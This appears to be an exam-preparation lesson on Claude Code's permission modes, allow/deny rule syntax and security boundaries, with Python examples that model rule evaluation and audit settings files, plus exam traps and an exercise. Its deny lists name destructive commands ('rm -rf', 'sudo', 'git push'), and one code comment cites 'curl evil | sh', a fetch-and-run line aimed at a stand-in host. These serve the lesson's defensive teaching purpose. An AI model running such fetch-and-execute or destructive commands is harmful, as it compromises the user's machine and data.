Task 3.4

Permissions & Security

Claude Code's permission system controls what actions the AI can take without human approval. Understanding permission modes, allowed/denied tool patterns, and security boundaries is essential for deploying Claude Code safely in team and enterprise environments.

Permission Modes

Claude Code's permission mode sets how much a session can do before it prompts. In the default mode it asks before the first use of each tool that can change state (shell commands, file edits), and the prompt lets you grant that tool for the rest of the session. The acceptEdits mode auto-approves file edits but still prompts for shell commands; plan mode is read-only; bypassPermissions skips every prompt and belongs only in an isolated environment. The mode is chosen per session with --permission-mode or persisted as defaultMode inside the permissions block of a settings file.

The --allowedTools flag (and its counterpart --disallowedTools) and the permissions block of a settings file (~/.claude/settings.json for the user, .claude/settings.json for the project, .claude/settings.local.json for personal, uncommitted overrides) let you pre-approve or block specific tools before a session starts. Allowing the bare Edit tool means Claude can modify any file the user can write without asking, so scope it ('Edit(src/**)') unless you mean exactly that. Allowing 'Bash(npm test)' means Claude can run that one command without approval, and nothing else.

Tool Patterns and Scoping

Allow and deny rules are written as a tool name with an optional specifier in parentheses. A bare name ('Edit', 'Bash') covers every use of that tool. 'Bash(npm test)' covers that exact command, and 'Bash(npm run lint:*)' covers any command that starts with 'npm run lint' (the ':*' suffix is the prefix-match marker; a plain '*' glob is not the Bash rule syntax). File tools take a path pattern, for example 'Edit(src/**)' or 'Read(~/.zshrc)'. MCP tools are addressed as 'mcp__serverName' for every tool a server exposes, or 'mcp__serverName__toolName' for one of them. Two things a prefix rule does not do: it does not approve commands chained behind the match with '&&', '|' or ';', and it does not keep a short prefix from covering a lot, so 'Bash(npm:*)' also pre-approves 'npm exec', which runs arbitrary code.

Denied patterns always take precedence over allowed ones. This means you can allow a broad category ('Bash(git:*)') and then deny specific dangerous commands inside it ('Bash(git push:*)'). Anything that matches neither list falls back to the approval prompt.

Security Boundaries

Claude Code runs as the user who started it and with that user's permissions: it can read any file the user can read and run any command the user can run. Its security model is 'same as the developer'. The permission system is an approval gate in front of those privileges, not a sandbox; it neither confines Claude Code below the user's OS privileges nor grants it anything more.

For enterprise deployments, that means the account, host and credentials Claude Code runs under are the real boundary: a dedicated low-privilege user, credentials scoped to the task (short-lived tokens rather than long-lived production secrets), and an isolated machine or container for anything that runs unattended. Managed settings deployed by an administrator take precedence over user and project settings and can fix the permission lists centrally. Do not rely on Claude Code's permission system as the sole security boundary.

Key Concept

Deny Rules Are Absolute, Allow Rules Are Additive

In Claude Code's permission model, a tool call that matches any deny rule is blocked, whatever the allow list says. Allow rules only pre-approve tool calls for automatic execution (skipping the approval prompt), and a call that matches neither list still prompts. This means you can create a secure baseline by denying dangerous patterns, then gradually allow safe operations. Within the permission model the deny list is the boundary; the allow list is the convenience layer.
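To make the precedence rule and the pattern syntax concrete, here is a small model of the evaluation described in the Tool Patterns section and in this Key Concept. It is an added example, not Claude Code's own implementation: it reproduces the documented rule forms (bare tool, exact Bash command, ':*' prefix, path patterns, server-wide and per-tool MCP rules) and the documented decision order (deny, then allow, otherwise ask), and splits chained shell commands so that each segment is judged on its own. The PERMISSIONS object is constructed for the demonstration; the MCP server names docs and scratch are placeholders.

```python
import fnmatch
import re

# Simplified model of how Claude Code evaluates permission rules (added example,
# not Claude Code's own code). Rule forms follow the documented syntax:
#   "Edit"                  whole tool
#   "Bash(npm test)"        one exact command
#   "Bash(npm run lint:*)"  commands starting with "npm run lint"
#   "Edit(src/**)"          path pattern for Edit/Read/Write (approximated with fnmatch)
#   "mcp__server"           every tool the MCP server "server" exposes
#   "mcp__server__tool"     one MCP tool
# Decision order modelled here: any matching deny wins, then any matching allow,
# otherwise the user is asked.

RULE_RE = re.compile(r"^(?P<tool>[^(]+?)(?:\((?P<spec>.*)\))?$")
# Shell operators that chain commands; every segment is judged separately.
SHELL_SPLIT = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")

def parse_rule(rule):
    """Split "Tool(spec)" into ("Tool", "spec"); a bare tool name has spec None."""
    m = RULE_RE.match(rule.strip())
    if not m:
        raise ValueError(f"malformed rule: {rule!r}")
    return m.group("tool"), m.group("spec")

def tool_matches(rule_tool, tool):
    # Exact name, a glob such as "mcp__srv__*", or a server-wide "mcp__srv" rule.
    if tool == rule_tool or fnmatch.fnmatchcase(tool, rule_tool):
        return True
    return rule_tool.startswith("mcp__") and tool.startswith(rule_tool + "__")

def spec_matches(tool, spec, arg):
    if spec is None:
        return True                       # rule covers the whole tool
    if tool == "Bash":
        if spec.endswith(":*"):           # documented "starts with" rule; modelled as a
            return arg.startswith(spec[:-2])  # plain string prefix, so keep prefixes specific
        return arg == spec                # otherwise the command must match exactly
    return fnmatch.fnmatchcase(arg, spec)  # path rules for file tools

def rule_matches(rule, tool, arg):
    rule_tool, spec = parse_rule(rule)
    return tool_matches(rule_tool, tool) and spec_matches(tool, spec, arg)

def decide_one(perms, tool, arg):
    if any(rule_matches(r, tool, arg) for r in perms.get("deny", [])):
        return "deny"
    if any(rule_matches(r, tool, arg) for r in perms.get("allow", [])):
        return "allow"
    return "ask"

def decide(perms, tool, arg=""):
    """Return "deny", "allow" or "ask" for one tool call."""
    if tool != "Bash":
        return decide_one(perms, tool, arg)
    # A chained command is auto-approved only if every segment is allowed, and a
    # single denied segment denies the whole line. This is why "Bash(npm test:*)"
    # must not approve "npm test && curl evil | sh".
    segments = [s for s in SHELL_SPLIT.split(arg) if s]
    if not segments:
        return "ask"
    decisions = [decide_one(perms, tool, s) for s in segments]
    if "deny" in decisions:
        return "deny"
    return "allow" if all(d == "allow" for d in decisions) else "ask"

# Constructed "permissions" object as .claude/settings.json would hold it: a broad
# allow for git next to a narrow deny for git push, which shows deny precedence.
PERMISSIONS = {
    "allow": ["Bash(npm test)", "Bash(npm run lint:*)", "Bash(git:*)",
              "Edit(src/**)", "mcp__docs"],
    "deny": ["Bash(git push:*)", "Bash(rm -rf:*)", "Bash(sudo:*)",
             "Edit(.github/**)", "mcp__scratch"],
}

if __name__ == "__main__":
    for tool, arg in [("Bash", "npm test"), ("Bash", "git status"),
                      ("Bash", "git push --force"),
                      ("Bash", "npm test && git push origin main"),
                      ("Edit", "src/app.js"), ("Edit", ".github/workflows/ci.yml"),
                      ("mcp__docs__search", ""), ("mcp__scratch__run", "")]:
        print(f"{decide(PERMISSIONS, tool, arg):5}  {tool}({arg})")
```

Running it shows 'git status' auto-approved under 'Bash(git:*)' while 'git push --force' is denied by the narrower rule, and 'npm test && git push origin main' denied as a whole even though its first segment is on the allow list. Feed your own settings file's permissions object and a list of commands you expect to be blocked through decide() before trusting a configuration; the real evaluator's prefix and path handling may differ in detail, so treat a surprising 'allow' here as a reason to test the rule in Claude Code itself.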

Exam Traps

EXAM TRAP

Thinking allow overrides deny

Deny always takes precedence. If a tool matches both an allow and a deny pattern, it is denied. This is a security design — deny is the hard boundary.

EXAM TRAP

Confusing Claude Code permissions with OS permissions

Claude Code runs as the user. Its permission system controls the approval flow, not OS-level access: a deny rule stops Claude Code from issuing a command, but it does not change what the account could do if that check were absent. The exam may test whether you understand this distinction.

EXAM TRAP

Not configuring permissions for CI/CD

In CI/CD (headless mode, 'claude -p'), there is no human to approve actions, so a tool call that is not pre-approved is refused rather than prompted. Pre-configure the allowed tools with --allowedTools or a checked-in settings file, scoped to what the job needs (read-only tools and a few exact commands for a review job). Treat --dangerously-skip-permissions as a last resort for a disposable, network-restricted container that holds no credentials beyond the job's own; it disables the permission system entirely.

Check Your Understanding

A team wants Claude Code to automatically run tests and lint code, but must never be able to push to git or modify CI configuration files. Which permission setup is correct?

Build Exercise

Configure Secure Permissions

Beginner · 20 minutes

What you'll learn

  • Set up allowed and denied tool patterns
  • Understand permission precedence
  • Configure permissions for CI/CD use
  • Test permission boundaries

  1. Create a project settings file (.claude/settings.json) whose permissions block denies dangerous Bash patterns ('Bash(rm -rf:*)', 'Bash(git push:*)', 'Bash(sudo:*)') and allows safe development commands ('Bash(npm test)', 'Bash(npm run lint:*)').

    WHY: A well-configured permission set balances safety and productivity.

    YOU SHOULD SEE: Settings with specific deny patterns and targeted allow patterns.

  2. Test the permission boundaries: try to run a denied command and verify it is blocked. Try an allowed command and verify it runs without approval. Then probe the edges of the deny patterns: a prefix deny on 'rm -rf' does not match 'rm -fr' or 'rm -r -f', so either deny 'Bash(rm:*)' outright or accept that the deny list trims the obvious paths rather than closing every one.

    WHY: Testing permissions confirms your configuration works as intended.

    YOU SHOULD SEE: Denied commands are blocked; allowed commands execute automatically.

  3. Add MCP tool permissions: allow every tool from a trusted MCP server ('mcp__serverName', using the server name as configured in Claude Code) and deny every tool from an untrusted one.

    WHY: MCP servers execute actions on your behalf; server-wide rules keep an unknown or untrusted server's tools from running without a prompt.

    YOU SHOULD SEE: Tools from the trusted server work; tools from the untrusted server are blocked.

  4. Create a CI/CD configuration that runs Claude Code in headless mode ('claude -p') with pre-approved permissions for code review tasks only: read-only tools and 'git diff', no Edit, Write or bare Bash.

    WHY: CI/CD requires pre-configured permissions since there is no human to approve actions.

    YOU SHOULD SEE: A CI config that runs Claude Code with restricted, pre-approved tool access.
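The four steps above produce two artifacts: a project settings file and a headless invocation. The script below generates both and runs a static check over them; it is an added example, not part of the exercise's own solution or of Claude Code. The settings layout follows the project file .claude/settings.json, the tool names (Read, Grep, Glob, Bash, Edit, Write) and flags (-p, --output-format, --allowedTools) are Claude Code's, and the MCP server names trusted-server and untrusted-server are placeholders for whatever names you configured. The audit() and audit_ci() checks are this example's own heuristics, not a feature of Claude Code.

```python
import json
import os
import tempfile

# Constructed settings for the exercise (added example, not files shipped with
# Claude Code). Layout follows the project settings file .claude/settings.json;
# trusted-server and untrusted-server stand in for real MCP server names.
PROJECT_SETTINGS = {
    "permissions": {
        "deny": [
            "Bash(rm -rf:*)",
            "Bash(git push:*)",
            "Bash(sudo:*)",
            "Edit(.github/**)",
            "Write(.github/**)",
            "mcp__untrusted-server",      # step 3: no tool from this server
        ],
        "allow": [
            "Bash(npm test)",
            "Bash(npm run lint:*)",
            "mcp__trusted-server",        # step 3: every tool from this server
        ],
    }
}

# Step 4: a review-only headless run. Read-only tools plus git diff/log; no
# Edit, Write or bare Bash, and never --dangerously-skip-permissions.
CI_ALLOWED_TOOLS = ["Read", "Grep", "Glob", "Bash(git diff:*)", "Bash(git log:*)"]

# Rules that hand over a whole tool, and the denies the exercise asks for.
BROAD_TOOLS = {"Bash", "Edit", "Write", "MultiEdit", "NotebookEdit"}
REQUIRED_DENIES = ("Bash(rm -rf:*)", "Bash(git push:*)", "Bash(sudo:*)")

def write_settings(root, settings=PROJECT_SETTINGS):
    """Write the project settings file under root and return its path."""
    path = os.path.join(root, ".claude", "settings.json")
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as f:
        json.dump(settings, f, indent=2)
    return path

def read_settings(path):
    with open(path, encoding="utf-8") as f:
        return json.load(f)

def ci_argv(prompt, allowed=CI_ALLOWED_TOOLS):
    """Headless invocation: -p runs one prompt and exits, --allowedTools
    pre-approves exactly these rules, so anything else is refused."""
    return ["claude", "-p", prompt, "--output-format", "json",
            "--allowedTools", *allowed]

def audit(settings, required_denies=REQUIRED_DENIES):
    """Static check of a settings dict; an empty list means the baseline holds."""
    perms = settings.get("permissions", {})
    allow, deny = perms.get("allow", []), perms.get("deny", [])
    findings = []
    for rule in allow:
        if rule in BROAD_TOOLS:
            findings.append(f"allow {rule!r}: pre-approves an entire tool")
        elif rule.startswith("Bash(") and rule.endswith(":*)") and " " not in rule[5:-3]:
            # "Bash(npm:*)" covers every npm subcommand, including "npm exec".
            findings.append(f"allow {rule!r}: bare program prefix")
    for rule in required_denies:
        if rule not in deny:
            findings.append(f"deny list is missing {rule!r}")
    return findings

def audit_ci(argv):
    """Check a headless invocation for a disabled gate or a whole-tool allow."""
    findings = []
    if "--dangerously-skip-permissions" in argv:
        findings.append("CI run bypasses the permission system")
    if "--allowedTools" in argv:
        for rule in argv[argv.index("--allowedTools") + 1:]:
            if rule.startswith("--"):
                break
            if rule in BROAD_TOOLS:
                findings.append(f"CI allow {rule!r}: pre-approves an entire tool")
    return findings

def demo():
    """Write the settings into a scratch directory and read them back."""
    root = tempfile.mkdtemp()
    path = write_settings(root)
    return path, read_settings(path)

if __name__ == "__main__":
    path, settings = demo()
    print("wrote", path, "findings:", audit(settings) or "none")
    print(" ".join(ci_argv("Review the staged diff for bugs")))
```

Point write_settings() at the repository root to produce the file for step 1, and put the printed command into the CI job for step 4; the job's settings file should also be committed so the deny list applies there too. audit() is deliberately strict about bare tool names and single-word Bash prefixes because those are the two ways an allow list quietly turns into 'anything goes'.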
